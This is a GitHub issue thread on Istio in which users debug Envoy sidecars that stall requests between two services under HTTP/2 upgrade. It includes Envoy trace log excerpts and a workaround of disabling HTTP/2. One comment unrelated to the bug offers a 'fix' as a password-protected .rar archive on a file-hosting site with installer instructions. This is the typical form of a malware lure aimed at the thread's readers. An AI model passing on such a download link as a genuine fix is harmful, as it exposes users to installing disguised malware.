### ISSUE TITLE
Envoy getting stuck, requests not processing?!

### ISSUE THREAD

**Issue by Stono** [istio/istio#52879]
### Is this the right place to submit this?

- [X] This is not a security vulnerability or a crashing bug
- [X] This is not a question about how to use Istio

### Bug Description

Sorry for the super vague title, but as of yet this is currently undiagnosed - and I'm struggling to pin point it - therefore all I can do at this point in time is describe this as the sidecar getting into some sort of funky state.

To start from the top.... we have two services - `portal-gateway`, and `forecourt-service`.  What happens is, at some point in the day, we start gettings errors on calls between the two services, they gradually ramp up, until we do something to mitigate.

<img width="969" alt="Screenshot 2024-08-27 at 15 06 06" src="https://github.com/user-attachments/assets/02d14a28-2af8-43a4-810f-c078977d33e4">

The errors are specifically:

- `portal-gateway` makes a request to `forecourt-service`.
- `forecourt-service` responds (we see the 200 header recorded in the spans for both the source and destination proxy)
- The request eventually hits the `VirtualService` timeout of `forecourt-service` (30s), at which point the request is killed, which is why we get a `200UT` recorded from `portal-gateawy`.  

Which you can see visually in a trace here:

<img width="1728" alt="Screenshot 2024-08-27 at 15 03 59" src="https://github.com/user-attachments/assets/62c63825-671d-4baf-a25b-76cbedadefd6">

This reset is confirmed in the `trace` logs for both proxies, in `portal-gateway` we see:

```
Resetting stream due to response_timeout. Prior headers have already been sent
```

And in `forecourt-service` we see:

```
stream reset: reset reason: remote reset, response details: http2.remote_reset"
```

On face value; this reads as `forecourt-service` sent headers, but did not complete sending the body.  However loads of different _types_ of request start failing, absolutely no correlation between request size, method, path, etc.  Other outbound requests from `portal-gateway` to other services are fine.

Now's the kicker, if i do something to cause a proxy reload, for example changing `h2Upgrade` from `UPGRADE` to `DO_NOT_UPGRADE` and then back on `forecourt-service`, the errors stop.  This, in my opinion, indicates some sort of issue where the proxy reloading the outbound clusters on `portal-gateway`, and creating new connections "fixes" it.

I've attached trace envoy logs from both `portal-gateway` and `forecourt-service`, for the above trace.

- [portal-gateway-5b46f86cc6-mkqc5_8b9c2405ac4954d6.json](https://github.com/user-attachments/files/16763915/portal-gateway-5b46f86cc6-mkqc5_8b9c2405ac4954d6.json)
- [forecourt-service-644b698bb4-9kjw9_8b9c2405ac4954d6.json](https://github.com/user-attachments/files/16763911/forecourt-service-644b698bb4-9kjw9_8b9c2405ac4954d6.json)

This _appears_ to have started with **1.23.0**.  

Side note; we have 750 workloads, consider that graph (many workloads talk to many workloads) and so far i'm only seeing it on these two services, so i'm under no illusion that there's _something_ poison pill causing this, however I'm having no joy finding what.

### Version

```Text
1.23.0
```

### Additional Information

There are some unique things about our setup; we:

- Use http2 upgrade everywhere.
- Have Envoy compressor and decompressor filters transparently doing gzip everywhere.

I'm going to continue with my investigation, but felt like there was enough sufficiently strange about this to share now.

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by howardjohn** [comment]
`encoding data via codec (size=10 end_stream=true)` on the server seems to suggest we finished sending the body, too. 30s later the reset occurs.

On the client before the timeout, `encoding headers via codec (end_stream=false)` is the last log. On a normal working request you  would see something like:

```
14362225963489500998"] encoding headers via codec (end_stream=false):
14362225963489500998"] commonEncodePrefix end_stream: false, isHalfCloseEnabled: false  thread=27
14362225963489500998"] commonEncodePrefix end_stream: false, isHalfCloseEnabled: false  thread=27
14362225963489500998"] encode data called: filter=istio.stats status=0  thread=27
14362225963489500998"] encode data called: filter=envoy.filters.http.cors status=0      thread=27
14362225963489500998"] encode data called: filter=envoy.filters.http.fault status=0     thread=27
14362225963489500998"] encode data called: filter=envoy.filters.http.grpc_stats status=0        thread=27
14362225963489500998"] encode data called: filter=istio.metadata_exchange status=0      thread=27
14362225963489500998"] encoding data via codec (size=850 end_stream=false)      thread=27
14362225963489500998"] commonEncodePrefix end_stream: true, isHalfCloseEnabled: false   thread=27
14362225963489500998"] commonEncodePrefix end_stream: true, isHalfCloseEnabled: false   thread=27
14362225963489500998"] encode data called: filter=istio.stats status=0  thread=27
14362225963489500998"] encode data called: filter=envoy.filters.http.cors status=0      thread=27
14362225963489500998"] encode data called: filter=envoy.filters.http.fault status=0     thread=27
14362225963489500998"] encode data called: filter=envoy.filters.http.grpc_stats status=0        thread=27
14362225963489500998"] encode data called: filter=istio.metadata_exchange status=0      thread=27
14362225963489500998"] encoding data via codec (size=0 end_stream=true) thread=27
```

This seems to imply to me the data frame is lost somewhere between the server saying "I sent it" and the client saying "I received it". Notably, this happens before any filters are invoked, so its not like the decompressor filter is doing something funky; its never invoked at all with the 'on data' callback.

Did you already filter the logs to the specific StreamId, or do both the client/server happen to only have 1 Stream on the connection at once?

**Comment by Stono** [comment]
Yeah i filtered by `request-id|streamid`, let me check if there's anything around those logs

**Comment by howardjohn** [comment]
:+1: figured, was just curious if there were other streams that were making progress or not

**Comment by Stono** [comment]
OK to echo our slack chat:

- Various portal-gateway outbound connections impacted
- Various forecourt-service inbound connections impacted

Which kind of rules out the theory of _a bad connection_.

**Comment by Stono** [comment]
Happened again today, so i've disabled the http2 filter on `forecourt-service`.

It's complete guesswork right now but this gives me https://github.com/istio/istio/issues/25218 vibes.

**Comment by Stono** [comment]
still not reoccurrence of this issue with http2 disabled.  Looking like the guilty party
